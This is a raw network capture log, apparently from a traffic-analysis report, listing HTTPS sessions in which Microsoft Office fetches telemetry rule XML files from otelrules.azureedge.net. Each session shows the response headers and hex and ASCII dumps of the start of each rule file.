Session ID	Source IP	Source Port	Destination IP	Destination Port
102	192.168.2.6	49837	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:53 UTC	192	OUT	GET /rules/rule120677v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:54 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:54 GMT Content-Type: text/xml Content-Length: 405 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT ETag: "0x8DC582B942B6AFF" x-ms-request-id: b8e80a8d-201e-000c-1e03-4879c4000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095154Z-r1cf579d7784wpmvhC1EWRk4cn00000001eg0000000029x6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:54 UTC	405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <

Session ID	Source IP	Source Port	Destination IP	Destination Port
103	192.168.2.6	49839	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:55 UTC	192	OUT	GET /rules/rule120680v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:56 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:56 GMT Content-Type: text/xml Content-Length: 1952 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B956B0F3D" x-ms-request-id: 42d07f15-f01e-0099-5306-489171000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095156Z-r1cf579d778z4wflhC1EWRa3h000000002200000000024rx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:56 UTC	1952	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
104	192.168.2.6	49840	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:55 UTC	192	OUT	GET /rules/rule120681v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:56 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:56 GMT Content-Type: text/xml Content-Length: 958 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT ETag: "0x8DC582BA0A31B3B" x-ms-request-id: 0b61f7bb-f01e-0052-4103-489224000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095156Z-r1cf579d77898tqwhC1EWRf9q8000000022g000000001xvb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-12-07 09:51:56 UTC	958	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
105	192.168.2.6	49841	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:55 UTC	192	OUT	GET /rules/rule120682v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:56 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:56 GMT Content-Type: text/xml Content-Length: 501 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT ETag: "0x8DC582BACFDAACD" x-ms-request-id: 7e532cc8-301e-000c-2603-48323f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095156Z-r1cf579d778g2t6ghC1EWRfggs00000001gg000000000xrq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:56 UTC	501	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
106	192.168.2.6	49842	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:55 UTC	193	OUT	GET /rules/rule120602v10s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:56 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:56 GMT Content-Type: text/xml Content-Length: 2592 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5B890DB" x-ms-request-id: b9410fe1-901e-0015-5b03-48b284000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095156Z-r1cf579d778xq4f9hC1EWRx41g00000001t0000000003gzu x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:56 UTC	2592	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=

Session ID	Source IP	Source Port	Destination IP	Destination Port
107	192.168.2.6	49843	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:57 UTC	192	OUT	GET /rules/rule120601v3s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:58 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:58 GMT Content-Type: text/xml Content-Length: 3342 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT ETag: "0x8DC582B927E47E9" x-ms-request-id: 1dbd6d1b-a01e-0002-3903-485074000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095158Z-r1cf579d778g2t6ghC1EWRfggs00000001eg0000000022qt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:58 UTC	3342	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI

Session ID	Source IP	Source Port	Destination IP	Destination Port
108	192.168.2.6	49844	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:57 UTC	193	OUT	GET /rules/rule224901v11s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:58 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:58 GMT Content-Type: text/xml Content-Length: 2284 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT ETag: "0x8DC582BCD58BEEE" x-ms-request-id: ef8e0549-001e-0066-1d03-48561e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095158Z-r1cf579d7784wpmvhC1EWRk4cn00000001eg000000002a8c x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:58 UTC	2284	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"

Session ID	Source IP	Source Port	Destination IP	Destination Port
109	192.168.2.6	49845	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:58 UTC	191	OUT	GET /rules/rule90401v3s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:58 UTC	515	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:58 GMT Content-Type: text/xml Content-Length: 1250 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT ETag: "0x8DC582BDE4487AA" x-ms-request-id: 5b9ff148-a01e-000d-0606-48d1ea000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095158Z-r1cf579d778bb9vvhC1EWRs95400000001fg0000000046yr x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-12-07 09:51:58 UTC	1250	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 39 30 34 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 53 61 6d 70 6c 69 6e 67 50 6f 6c 69 63 79 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 4d 65 74 61 64 61 74 61 22 20 2f 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="90401" V="3" DC="ESM" EN="Office.Telemetry.SamplingPolicy" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" DL="A" DCa="PSP PSU" xmlns=""> <RIS> <RI N="Metadata" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
110	192.168.2.6	49846	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:58 UTC	192	OUT	GET /rules/rule701201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:58 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:58 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT ETag: "0x8DC582BE3E55B6E" x-ms-request-id: a85144f8-201e-0033-7f03-48b167000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095158Z-r1cf579d778d5zkmhC1EWRk6h800000002c0000000003m2t x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:58 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"

Session ID	Source IP	Source Port	Destination IP	Destination Port
111	192.168.2.6	49847	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:59 UTC	192	OUT	GET /rules/rule701200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:52:00 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:52:00 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDC681E17" x-ms-request-id: 8a7a9c83-801e-0078-4106-48bac6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095200Z-r1cf579d77867vg8hC1EWR8knc00000001vg000000001ytz x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:52:00 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
112	192.168.2.6	49849	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:52:00 UTC	192	OUT	GET /rules/rule700200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:52:00 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:52:00 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF66E42D" x-ms-request-id: 49b561ed-d01e-0065-2706-48b77a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095200Z-r1cf579d778lntp7hC1EWR9gg400000001bg0000000044nh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:52:00 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
113	192.168.2.6	49848	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:52:00 UTC	192	OUT	GET /rules/rule700201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:52:00 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:52:00 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT ETag: "0x8DC582BE39DFC9B" x-ms-request-id: 3fcff9c6-e01e-0052-0a03-48d9df000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095200Z-r1cf579d7784wpmvhC1EWRk4cn00000001fg000000001z3w x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
